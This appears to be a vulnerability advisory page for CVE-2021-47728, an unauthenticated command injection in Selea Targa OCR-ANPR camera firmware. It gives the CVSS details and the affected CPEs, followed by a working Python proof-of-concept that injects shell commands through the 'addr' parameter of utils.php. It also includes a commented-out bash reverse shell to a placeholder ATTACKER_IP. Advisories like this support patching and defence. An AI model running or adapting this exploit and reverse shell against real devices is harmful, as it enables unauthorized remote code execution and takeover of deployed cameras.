Security Vulnerability Report
CVE-2021-47728 CVSS 9.8 CRITICAL

CVE-2021-47728

Published: 2025-12-09 21:15:51
Last Modified: 2026-02-23 19:00:13

Description

Selea Targa IP OCR-ANPR Camera contains an unauthenticated command injection vulnerability in utils.php that allows remote attackers to execute arbitrary shell commands. Attackers can exploit the 'addr' and 'port' parameters to inject commands and gain www-data user access through chained local file inclusion techniques.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:selea:izero_box_full_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:selea:izero_box_full:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:selea:izero_column_entry\/8_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:selea:izero_column_entry\/8:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:selea:izero_column_full\/8_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:selea:izero_column_full\/8:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:selea:targa_504_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:selea:targa_504:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:selea:targa_512_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:selea:targa_512:-:*:*:*:*:*:*:* - NOT VULNERABLE
Selea Targa IP OCR-ANPR Camera (firmware version not specified)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2021-47728 PoC - Selea Targa IP Camera Unauthenticated Command Injection
# Target: Selea Targa IP OCR-ANPR Camera
# Vulnerability: Command Injection in utils.php via 'addr' and 'port' parameters

TARGET = "http://target-ip:80"


def exploit(target, cmd):
    """Execute command injection via addr parameter"""
    payload = f";{cmd};"
    params = {
        'addr': payload,
        'port': '80'
    }
    try:
        response = requests.get(f"{target}/utils.php", params=params, timeout=10)
        return response.text
    except Exception as e:
        return f"Error: {str(e)}"


# Example usage - check if vulnerable
if __name__ == "__main__":
    # Test basic command injection
    result = exploit(TARGET, "id")
    print(result)

    # Reverse shell example (attacker needs listener)
    # exploit(TARGET, "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1")
